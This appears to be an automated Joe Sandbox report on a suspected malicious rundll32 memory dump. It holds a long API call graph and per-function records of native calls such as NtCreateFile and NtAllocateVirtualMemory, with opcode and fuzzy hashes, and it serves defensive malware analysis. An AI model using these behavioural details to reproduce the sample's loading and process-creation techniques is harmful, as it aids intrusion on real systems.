29459 25cb960 3 API calls 29458->29459 29594 25cb8d0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 29458->29594 29459->29458 29460 25c3627 29462 25cb830 2 API calls 29460->29462 29461->29460 29585 25cb960 29461->29585 29463 25c363d 29462->29463 29465 25c367a 29463->29465 29467 25cb960 3 API calls 29463->29467 29466 25cb830 2 API calls 29465->29466 29468 25c3685 29466->29468 29467->29463 29469 25cb960 3 API calls 29468->29469 29471 25c36bf 29468->29471 29469->29468 29591 25cb890 29471->29591 29473 25cb890 2 API calls 29474 25c37be 29473->29474 29475 25cb890 2 API calls 29474->29475 29476 25c37c8 29475->29476 29477 25cb890 2 API calls 29476->29477 29478 25c37d2 29477->29478 29479 25cb890 2 API calls 29478->29479 29479->29480 29480->29337 29482 25c4821 29481->29482 29483 25c3ed0 8 API calls 29482->29483 29488 25c4837 29483->29488 29484 25c4840 29484->29341 29485 25c4877 29486 25ca680 2 API calls 29485->29486 29487 25c4888 29486->29487 29487->29341 29488->29484 29488->29485 29489 25c48c3 29488->29489 29490 25ca680 2 API calls 29489->29490 29491 25c48c8 29490->29491 29491->29341 29595 25c9380 29492->29595 29494 25c9504 29495 25c9380 LdrLoadDll 29494->29495 29496 25c950d 29495->29496 29497 25c9380 LdrLoadDll 29496->29497 29498 25c9516 29497->29498 29499 25c9380 LdrLoadDll 29498->29499 29500 25c951f 29499->29500 29501 25c9380 LdrLoadDll 29500->29501 29502 25c9528 29501->29502 29503 25c9380 LdrLoadDll 29502->29503 29504 25c9531 29503->29504 29505 25c9380 LdrLoadDll 29504->29505 29506 25c953d 29505->29506 29507 25c9380 LdrLoadDll 29506->29507 29508 25c9546 29507->29508 29509 25c9380 LdrLoadDll 29508->29509 29510 25c954f 29509->29510 29511 25c9380 LdrLoadDll 29510->29511 29512 25c9558 29511->29512 29513 25c9380 LdrLoadDll 29512->29513 29514 25c9561 29513->29514 29515 25c9380 LdrLoadDll 29514->29515 29516 25c956a 29515->29516 29517 25c9380 LdrLoadDll 29516->29517 29518 25c9576 29517->29518 29519 25c9380 LdrLoadDll 29518->29519 29520 25c957f 29519->29520 29521 25c9380 LdrLoadDll 29520->29521 29522 25c9588 29521->29522 29523 25c9380 LdrLoadDll 29522->29523 29524 25c9591 29523->29524 29525 25c9380 LdrLoadDll 29524->29525 29526 25c959a 29525->29526 29527 25c9380 LdrLoadDll 29526->29527 29528 25c95a3 29527->29528 29529 25c9380 LdrLoadDll 29528->29529 29530 25c95af 29529->29530 29531 25c9380 LdrLoadDll 29530->29531 29532 25c95b8 29531->29532 29533 25c9380 LdrLoadDll 29532->29533 29534 25c95c1 29533->29534 29535 25c9380 LdrLoadDll 29534->29535 29536 25c95ca 29535->29536 29537 25c9380 LdrLoadDll 29536->29537 29538 25c95d3 29537->29538 29539 25c9380 LdrLoadDll 29538->29539 29540 25c95dc 29539->29540 29541 25c9380 LdrLoadDll 29540->29541 29542 25c95e8 29541->29542 29543 25c9380 LdrLoadDll 29542->29543 29544 25c95f1 29543->29544 29545 25c9380 LdrLoadDll 29544->29545 29546 25c95fa 29545->29546 29547 25c9380 LdrLoadDll 29546->29547 29548 25c9603 29547->29548 29549 25c9380 LdrLoadDll 29548->29549 29550 25c960c 29549->29550 29551 25c9380 LdrLoadDll 29550->29551 29552 25c9615 29551->29552 29553 25c9380 LdrLoadDll 29552->29553 29554 25c9621 29553->29554 29555 25c9380 LdrLoadDll 29554->29555 29556 25c962a 29555->29556 29557 25c9380 LdrLoadDll 29556->29557 29558 25c9633 29557->29558 29559 25c9380 LdrLoadDll 29558->29559 29560 25c963c 29559->29560 29561 25c9380 LdrLoadDll 29560->29561 29562 25c9645 29561->29562 29563 25c9380 LdrLoadDll 29562->29563 29564 25c964e 29563->29564 29565 25c9380 LdrLoadDll 29564->29565 29566 25c965a 29565->29566 29567 25c9380 LdrLoadDll 29566->29567 29568 25c9663 29567->29568 29569 25c9380 LdrLoadDll 29568->29569 29570 25c966c 29569->29570 29570->29345 29572 25c9700 LdrLoadDll 29571->29572 29573 25c862c 29572->29573 29601 4619860 LdrInitializeThunk 29573->29601 29574 25c8643 29574->29267 29576->29342 29578 25c9700 LdrLoadDll 29577->29578 29579 25c8cac NtAllocateVirtualMemory 29578->29579 29579->29448 29581 25cb846 29580->29581 29582 25cb840 29580->29582 29583 25ca850 2 API calls 29581->29583 29582->29453 29584 25cb86c 29583->29584 29584->29453 29586 25cb8d0 29585->29586 29587 25ca850 2 API calls 29586->29587 29588 25cb92d 29586->29588 29589 25cb90a 29587->29589 29588->29461 29590 25ca680 2 API calls 29589->29590 29590->29588 29592 25ca680 2 API calls 29591->29592 29593 25c37b4 29592->29593 29593->29473 29594->29458 29596 25c939b 29595->29596 29597 25c42d0 LdrLoadDll 29596->29597 29599 25c93bb 29597->29599 29598 25c946f 29598->29494 29599->29598 29600 25c42d0 LdrLoadDll 29599->29600 29600->29598 29601->29574 29603 4619681 29602->29603 29604 461968f LdrInitializeThunk 29602->29604 29603->29351 29604->29351 29606 25c9700 LdrLoadDll 29605->29606 29607 25c8ddc RtlFreeHeap 29606->29607 29607->29354 29609 25b71cb 29608->29609 29610 25b71d0 29608->29610 29609->29275 29611 25ca600 2 API calls 29610->29611 29617 25b71f5 29611->29617 29612 25b7258 29612->29275 29613 25c8610 2 API calls 29613->29617 29614 25b725e 29616 25b7284 29614->29616 29618 25c8d10 2 API calls 29614->29618 29616->29275 29617->29612 29617->29613 29617->29614 29620 25ca600 2 API calls 29617->29620 29624 25c8d10 29617->29624 29619 25b7275 29618->29619 29619->29275 29620->29617 29622 25b749e 29621->29622 29623 25c8d10 2 API calls 29621->29623 29622->29232 29623->29622 29625 25c9700 LdrLoadDll 29624->29625 29626 25c8d2c 29625->29626 29629 46196e0 LdrInitializeThunk 29626->29629 29627 25c8d43 29627->29617 29629->29627 29631 25c9dc3 29630->29631 29634 25b9f70 29631->29634 29635 25b9f94 29634->29635 29636 25b9fd0 LdrLoadDll 29635->29636 29637 25b8eab 29635->29637 29636->29637 29637->29240 29639 25ba2e3 29638->29639 29641 25ba360 29639->29641 29654 25c83e0 LdrLoadDll 29639->29654 29641->29245 29643 25c9700 LdrLoadDll 29642->29643 29644 25bd3db 29643->29644 29644->29253 29645 25c8f20 29644->29645 29646 25c8f3f LookupPrivilegeValueW 29645->29646 29647 25c9700 LdrLoadDll 29645->29647 29646->29249 29647->29646 29649 25c89be 29648->29649 29650 25c9700 LdrLoadDll 29649->29650 29651 25c89cc 29650->29651 29655 4619910 LdrInitializeThunk 29651->29655 29652 25c89eb 29652->29250 29654->29641 29655->29652 29657 25ba44b 29656->29657 29658 25ba2c0 LdrLoadDll 29657->29658 29659 25ba496 29658->29659 29659->29191 29661 25ba1b4 29660->29661 29716 25c83e0 LdrLoadDll 29661->29716 29663 25ba1ee 29663->29193 29665 25bd5cc 29664->29665 29666 25ba440 LdrLoadDll 29665->29666 29667 25bd5de 29666->29667 29717 25bd4b0 29667->29717 29670 25bd5f9 29672 25bd604 29670->29672 29674 25c8be0 2 API calls 29670->29674 29671 25bd611 29673 25bd622 29671->29673 29675 25c8be0 2 API calls 29671->29675 29672->29197 29673->29197 29674->29672 29675->29673 29677 25bb316 29676->29677 29678 25bb320 29676->29678 29677->29206 29679 25ba2c0 LdrLoadDll 29678->29679 29680 25bb391 29679->29680 29681 25ba190 LdrLoadDll 29680->29681 29683 25bb3a5 29681->29683 29682 25bb3c8 29682->29206 29683->29682 29684 25ba2c0 LdrLoadDll 29683->29684 29685 25bb3e4 29684->29685 29686 25c3ed0 8 API calls 29685->29686 29687 25bb439 29686->29687 29687->29206 29689 25bbe96 29688->29689 29690 25ba2c0 LdrLoadDll 29689->29690 29691 25bbeaa 29690->29691 29736 25bbb60 29691->29736 29693 25b83cc 29714 25bb450 LdrLoadDll 29693->29714 29765 25bd860 29694->29765 29696 25b8073 29709 25b8271 29696->29709 29770 25c3820 29696->29770 29698 25b80d2 29698->29709 29773 25b7e10 29698->29773 29701 25cb830 2 API calls 29702 25b8119 29701->29702 29703 25cb960 3 API calls 29702->29703 29705 25b812e 29703->29705 29704 25b71c0 4 API calls 29710 25b8180 29704->29710 29705->29710 29832 25b3660 10 API calls 29705->29832 29709->29195 29710->29704 29710->29709 29712 25b7480 2 API calls 29710->29712 29778 25bb030 29710->29778 29828 25bd800 29710->29828 29833 25bd2e0 21 API calls 29710->29833 29712->29710 29713->29201 29714->29211 29715->29215 29716->29663 29718 25bd580 29717->29718 29719 25bd4ca 29717->29719 29718->29670 29718->29671 29720 25ba2c0 LdrLoadDll 29719->29720 29721 25bd4ec 29720->29721 29727 25c8690 29721->29727 29723 25bd52e 29730 25c86d0 29723->29730 29726 25c8be0 2 API calls 29726->29718 29728 25c9700 LdrLoadDll 29727->29728 29729 25c86ac 29728->29729 29729->29723 29731 25c9700 LdrLoadDll 29730->29731 29732 25c86ec 29731->29732 29735 4619fe0 LdrInitializeThunk 29732->29735 29733 25bd574 29733->29726 29735->29733 29737 25bbb77 29736->29737 29745 25bd8a0 29737->29745 29741 25bbbeb 29742 25bbbf2 29741->29742 29756 25c89f0 LdrLoadDll 29741->29756 29742->29693 29744 25bbc05 29744->29693 29746 25bd8c5 29745->29746 29757 25b74c0 29746->29757 29748 25bbbbf 29753 25c8e30 29748->29753 29749 25bd8e9 29749->29748 29750 25c3ed0 8 API calls 29749->29750 29752 25ca680 2 API calls 29749->29752 29764 25bd6e0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 29749->29764 29750->29749 29752->29749 29754 25c9700 LdrLoadDll 29753->29754 29755 25c8e4f CreateProcessInternalW 29754->29755 29755->29741 29756->29744 29758 25b75bf 29757->29758 29759 25b74d5 29757->29759 29758->29749 29759->29758 29760 25c3ed0 8 API calls 29759->29760 29761 25b7542 29760->29761 29762 25ca680 2 API calls 29761->29762 29763 25b7569 29761->29763 29762->29763 29763->29749 29764->29749 29766 25bd87f 29765->29766 29767 25c42d0 LdrLoadDll 29765->29767 29768 25bd88d 29766->29768 29769 25bd886 SetErrorMode 29766->29769 29767->29766 29768->29696 29769->29768 29772 25c3846 29770->29772 29834 25bd630 29770->29834 29772->29698 29774 25ca600 2 API calls 29773->29774 29777 25b7e35 29774->29777 29775 25b8050 29775->29701 29777->29775 29853 25c7fd0 29777->29853 29779 25bb049 29778->29779 29780 25bb04f 29778->29780 29901 25bd0f0 29779->29901 29910 25b8a60 29780->29910 29783 25bb05c 29784 25cb960 3 API calls 29783->29784 29827 25bb2f2 29783->29827 29785 25bb078 29784->29785 29786 25bb08c 29785->29786 29787 25bd800 2 API calls 29785->29787 29919 25c8460 29786->29919 29787->29786 29790 25bb1c0 29935 25bafd0 LdrLoadDll LdrInitializeThunk 29790->29935 29791 25c8650 2 API calls 29792 25bb10a 29791->29792 29792->29790 29798 25bb116 29792->29798 29794 25bb1df 29795 25bb1e7 29794->29795 29936 25baf40 LdrLoadDll NtClose LdrInitializeThunk 29794->29936 29796 25c8be0 2 API calls 29795->29796 29800 25bb1f1 29796->29800 29799 25bb169 29798->29799 29802 25c8760 2 API calls 29798->29802 29798->29827 29803 25c8be0 2 API calls 29799->29803 29800->29710 29801 25bb209 29801->29795 29804 25bb210 29801->29804 29802->29799 29805 25bb186 29803->29805 29806 25bb228 29804->29806 29937 25baec0 LdrLoadDll LdrInitializeThunk 29804->29937 29922 25c7a80 29805->29922 29938 25c84e0 LdrLoadDll 29806->29938 29810 25bb19d 29810->29827 29925 25b7630 29810->29925 29811 25bb23c 29939 25bad40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 29811->29939 29813 25bb260 29825 25bb2ad 29813->29825 29940 25c8510 LdrLoadDll 29813->29940 29818 25bb27e 29818->29825 29941 25c85a0 LdrLoadDll 29818->29941 29819 25bb2bb 29820 25c8be0 2 API calls 29819->29820 29821 25bb2c5 29820->29821 29823 25c8be0 2 API calls 29821->29823 29824 25bb2cf 29823->29824 29826 25b7630 3 API calls 29824->29826 29824->29827 29942 25c8570 LdrLoadDll 29825->29942 29826->29827 29827->29710 29829 25bd813 29828->29829 29830 25bd83e 29829->29830 30016 25c85e0 29829->30016 29830->29710 29832->29710 29833->29710 29835 25bd64d 29834->29835 29841 25c8710 29835->29841 29838 25bd695 29838->29772 29842 25c872c 29841->29842 29843 25c9700 LdrLoadDll 29841->29843 29851 46199a0 LdrInitializeThunk 29842->29851 29843->29842 29844 25bd68e 29844->29838 29846 25c8760 29844->29846 29847 25c877c 29846->29847 29848 25c9700 LdrLoadDll 29846->29848 29852 4619780 LdrInitializeThunk 29847->29852 29848->29847 29849 25bd6be 29849->29772 29851->29844 29852->29849 29854 25ca850 2 API calls 29853->29854 29855 25c7fe7 29854->29855 29874 25b85a0 29855->29874 29857 25c8002 29858 25c8029 29857->29858 29859 25c8040 29857->29859 29860 25ca680 2 API calls 29858->29860 29862 25ca600 2 API calls 29859->29862 29861 25c8036 29860->29861 29861->29775 29863 25c807a 29862->29863 29864 25ca600 2 API calls 29863->29864 29865 25c8093 29864->29865 29871 25c8334 29865->29871 29880 25ca640 LdrLoadDll 29865->29880 29867 25c8319 29868 25c8320 29867->29868 29867->29871 29869 25ca680 2 API calls 29868->29869 29870 25c832a 29869->29870 29870->29775 29872 25ca680 2 API calls 29871->29872 29873 25c8389 29872->29873 29873->29775 29875 25b85c5 29874->29875 29876 25b9f70 LdrLoadDll 29875->29876 29877 25b85f8 29876->29877 29879 25b861d 29877->29879 29881 25bb770 29877->29881 29879->29857 29880->29867 29882 25bb79c 29881->29882 29883 25c8930 LdrLoadDll 29882->29883 29884 25bb7b5 29883->29884 29885 25bb7bc 29884->29885 29892 25c8970 29884->29892 29885->29879 29889 25bb7f7 29890 25c8be0 2 API calls 29889->29890 29891 25bb81a 29890->29891 29891->29879 29893 25c9700 LdrLoadDll 29892->29893 29894 25c898c 29893->29894 29900 4619710 LdrInitializeThunk 29894->29900 29895 25bb7df 29895->29885 29897 25c8f60 29895->29897 29898 25c9700 LdrLoadDll 29897->29898 29899 25c8f7f 29897->29899 29898->29899 29899->29889 29900->29895 29943 25bc1e0 29901->29943 29903 25bd107 29904 25bd120 29903->29904 29956 25b3fb0 29903->29956 29906 25ca850 2 API calls 29904->29906 29907 25bd12e 29906->29907 29907->29780 29908 25bd11a 29983 25c7900 29908->29983 29911 25b8a7b 29910->29911 29912 25bd4b0 3 API calls 29911->29912 29918 25b8b9b 29911->29918 29913 25b8b7c 29912->29913 29914 25b8baa 29913->29914 29915 25b8b91 29913->29915 29916 25c8be0 2 API calls 29913->29916 29914->29783 30015 25b6230 LdrLoadDll 29915->30015 29916->29915 29918->29783 29920 25bb0e0 29919->29920 29921 25c9700 LdrLoadDll 29919->29921 29920->29790 29920->29791 29920->29827 29921->29920 29923 25bd800 2 API calls 29922->29923 29924 25c7ab2 29922->29924 29923->29924 29924->29810 29926 25b7648 29925->29926 29927 25b9f70 LdrLoadDll 29926->29927 29928 25b7663 29927->29928 29929 25c42d0 LdrLoadDll 29928->29929 29930 25b7673 29929->29930 29931 25b76ad 29930->29931 29932 25b767c PostThreadMessageW 29930->29932 29931->29710 29932->29931 29933 25b7690 29932->29933 29934 25b769a PostThreadMessageW 29933->29934 29934->29931 29935->29794 29936->29801 29937->29806 29938->29811 29939->29813 29940->29818 29941->29825 29942->29819 29944 25bc213 29943->29944 29988 25ba580 29944->29988 29946 25bc225 29992 25ba6f0 29946->29992 29948 25bc243 29949 25ba6f0 LdrLoadDll 29948->29949 29950 25bc259 29949->29950 29951 25bd630 3 API calls 29950->29951 29952 25bc27d 29951->29952 29953 25bc284 29952->29953 29954 25ca890 2 API calls 29952->29954 29953->29903 29955 25bc294 29954->29955 29955->29903 29957 25b3fdc 29956->29957 29958 25bb770 3 API calls 29957->29958 29960 25b40b3 29958->29960 29959 25b4632 29959->29908 29960->29959 29995 25ca8d0 29960->29995 29962 25b411e 29963 25ba2c0 LdrLoadDll 29962->29963 29964 25b42a4 29963->29964 29965 25ba2c0 LdrLoadDll 29964->29965 29966 25b42c8 29965->29966 29999 25bb830 29966->29999 29970 25b4363 29971 25b4429 29970->29971 29972 25bb830 2 API calls 29970->29972 29974 25ca600 2 API calls 29971->29974 29973 25b4402 29972->29973 29973->29971 29976 25c8870 2 API calls 29973->29976 29975 25b448d 29974->29975 29977 25ca600 2 API calls 29975->29977 29976->29971 29978 25b44a6 29977->29978 29978->29959 29979 25ba2c0 LdrLoadDll 29978->29979 29980 25b44e4 29979->29980 29981 25ba190 LdrLoadDll 29980->29981 29982 25b4596 29981->29982 29982->29908 29984 25c7921 29983->29984 29985 25c42d0 LdrLoadDll 29983->29985 29986 25c7947 29984->29986 29987 25c7934 CreateThread 29984->29987 29985->29984 29986->29904 29987->29904 29989 25ba5a7 29988->29989 29990 25ba2c0 LdrLoadDll 29989->29990 29991 25ba5e3 29990->29991 29991->29946 29993 25ba2c0 LdrLoadDll 29992->29993 29994 25ba709 29993->29994 29994->29948 29996 25ca8dd 29995->29996 29997 25c42d0 LdrLoadDll 29996->29997 29998 25ca8f0 29997->29998 29998->29962 30000 25bb855 29999->30000 30008 25c87e0 30000->30008 30003 25c8870 30004 25c9700 LdrLoadDll 30003->30004 30005 25c888c 30004->30005 30014 4619650 LdrInitializeThunk 30005->30014 30006 25c88ab 30006->29970 30009 25c9700 LdrLoadDll 30008->30009 30010 25c87fc 30009->30010 30013 46196d0 LdrInitializeThunk 30010->30013 30011 25b433c 30011->29970 30011->30003 30013->30011 30014->30006 30015->29918 30017 25c85fc 30016->30017 30018 25c9700 LdrLoadDll 30016->30018 30021 4619840 LdrInitializeThunk 30017->30021 30018->30017 30019 25c860b 30019->29830 30021->30019 30023 25c77d0 30024 25ca600 2 API calls 30023->30024 30026 25c780b 30024->30026 30025 25c78ec 30026->30025 30027 25b9f70 LdrLoadDll 30026->30027 30028 25c7841 30027->30028 30029 25c42d0 LdrLoadDll 30028->30029 30031 25c785d 30029->30031 30030 25c7870 Sleep 30030->30031 30031->30025 30031->30030 30034 25c7400 LdrLoadDll 30031->30034 30035 25c7600 LdrLoadDll 30031->30035 30034->30031 30035->30031

                                                                                            Executed Functions

                                                                                            Function 025C8A6B Relevance: 1.6, APIs: 1, Instructions: 60filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 573 25c8a6b-25c8a6f 574 25c8ac6-25c8b01 call 25c9700 NtCreateFile 573->574 575 25c8a71-25c8a86 573->575 577 25c8a8c-25c8aa9 575->577 578 25c8a87 call 25c9700 575->578 578->577
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,025C4037,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,025C4037,00000000,00000005,00000060,00000000,00000000), ref: 025C8AFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: b42823926d532e25a45e9a32b2661f906586ba0ef2d8c31884a6c700e2bb6f91
                                                                                            • Instruction ID: fb43f4b0a88a573a7f6aa1f6eae159060571d0ca7bf0f9115646daf183a45fac
                                                                                            • Opcode Fuzzy Hash: b42823926d532e25a45e9a32b2661f906586ba0ef2d8c31884a6c700e2bb6f91
                                                                                            • Instruction Fuzzy Hash: 4411E5B2204109AFCB08DF98DC85DEB77AEAF8C714F148558FA0D97241D630EC11CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8AB0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 607 25c8ab0-25c8b01 call 25c9700 NtCreateFile
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,025C4037,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,025C4037,00000000,00000005,00000060,00000000,00000000), ref: 025C8AFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: bd50952d6a5d74a00dbf8b16fe40b879aa92eaea86fb6d31d2479a21db387ed5
                                                                                            • Instruction ID: 744b5b3382616a89f77b13df5329ea4c5ab8799a7bb71fdc853d43080b2786c1
                                                                                            • Opcode Fuzzy Hash: bd50952d6a5d74a00dbf8b16fe40b879aa92eaea86fb6d31d2479a21db387ed5
                                                                                            • Instruction Fuzzy Hash: 72F0B2B2211108AFCB48CF88DC84EEB37EDAF8C754F118208FA0D97240D630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8B5A Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 611 25c8b5a-25c8ba9 call 25c9700 NtReadFile
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(025C41F2,5D0515AF,FFFFFFFF,025C3EB1,00000206,?,025C41F2,00000206,025C3EB1,FFFFFFFF,5D0515AF,025C41F2,00000206,00000000), ref: 025C8BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: c8d93374614ac6f3d413333453485ec7fc83a504f1ac39fdbd31d04127d6c400
                                                                                            • Instruction ID: 4a877f431309cf8da1a08e22da470fc1b9604d1fc3816bc92f589371daf678ee
                                                                                            • Opcode Fuzzy Hash: c8d93374614ac6f3d413333453485ec7fc83a504f1ac39fdbd31d04127d6c400
                                                                                            • Instruction Fuzzy Hash: 37F0ECB6200108AFCB14DF99DC85DEB77A9EF8C354F158258F94DD7251D630E811CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8B60 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(025C41F2,5D0515AF,FFFFFFFF,025C3EB1,00000206,?,025C41F2,00000206,025C3EB1,FFFFFFFF,5D0515AF,025C41F2,00000206,00000000), ref: 025C8BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 4f12b0cdba007ce0cf7b2678ba6d95ef09f50b31a4dbc7e195c84ade265fd998
                                                                                            • Instruction ID: 85acac4e3ff2914368a0e02ca996162b67ffc79731790eb502e5f17d507a6cbf
                                                                                            • Opcode Fuzzy Hash: 4f12b0cdba007ce0cf7b2678ba6d95ef09f50b31a4dbc7e195c84ade265fd998
                                                                                            • Instruction Fuzzy Hash: FBF0A4B6210108AFCB14DF89DC84EEB77ADAF8C754F158258FA0D97241D630E811CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8C8A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025B2D11,00002000,00003000,00000004), ref: 025C8CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: 4c8213930d425e82a781c7ea8c43950629b59a5d49baf5a5cafb08bfd3cc4d75
                                                                                            • Instruction ID: 908c936ed0f3df80c534132f2a830c5d8981acbc540c6ed6d4d3a28732843043
                                                                                            • Opcode Fuzzy Hash: 4c8213930d425e82a781c7ea8c43950629b59a5d49baf5a5cafb08bfd3cc4d75
                                                                                            • Instruction Fuzzy Hash: ADF015B6210218AFCB14DF98DC84EEB77AEAF88750F118258FE0897351C630E911CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8C90 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025B2D11,00002000,00003000,00000004), ref: 025C8CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: 15c3e8af5a7c288d35453841d97931a23a9690929f9788e26459187f702f6089
                                                                                            • Instruction ID: 296426be7e13565cc41219c67fd8e0f3d98be14cf8ce29ea32890d76a5ded9fe
                                                                                            • Opcode Fuzzy Hash: 15c3e8af5a7c288d35453841d97931a23a9690929f9788e26459187f702f6089
                                                                                            • Instruction Fuzzy Hash: 9FF015B6210208AFCB14DF89DC84EEB77ADAF88750F118218FE0897241C630F810CBB4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8BDA Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtClose.NTDLL(025C41D0,00000206,?,025C41D0,00000005,FFFFFFFF), ref: 025C8C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 92099098e21cc85ff9b848ee66d39d14b6430e86e7777f26eea8a842fcef6bd4
                                                                                            • Instruction ID: 45ae54ad82bc8bfdee45c37a22b6ce10dc8ca3dc59b04a17d2886212ae8bcd58
                                                                                            • Opcode Fuzzy Hash: 92099098e21cc85ff9b848ee66d39d14b6430e86e7777f26eea8a842fcef6bd4
                                                                                            • Instruction Fuzzy Hash: 87E08C75600144ABD720DFB8DC89EDB3F6AEF85360F204099F948AB262C532E601CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8BE0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtClose.NTDLL(025C41D0,00000206,?,025C41D0,00000005,FFFFFFFF), ref: 025C8C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 15dbace5be558ef9e440f90990e05e11b906f0c8f1825d7b106b6d8d10004a3c
                                                                                            • Instruction ID: a9758293728072d616a0bc6e7965d1f5e7664be68fa4d8eedb7140a16f57c895
                                                                                            • Opcode Fuzzy Hash: 15dbace5be558ef9e440f90990e05e11b906f0c8f1825d7b106b6d8d10004a3c
                                                                                            • Instruction Fuzzy Hash: 9BD01776200214ABD610EFD8DC89EDB7BADEF88760F114465FA086B242D930FA00CAE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
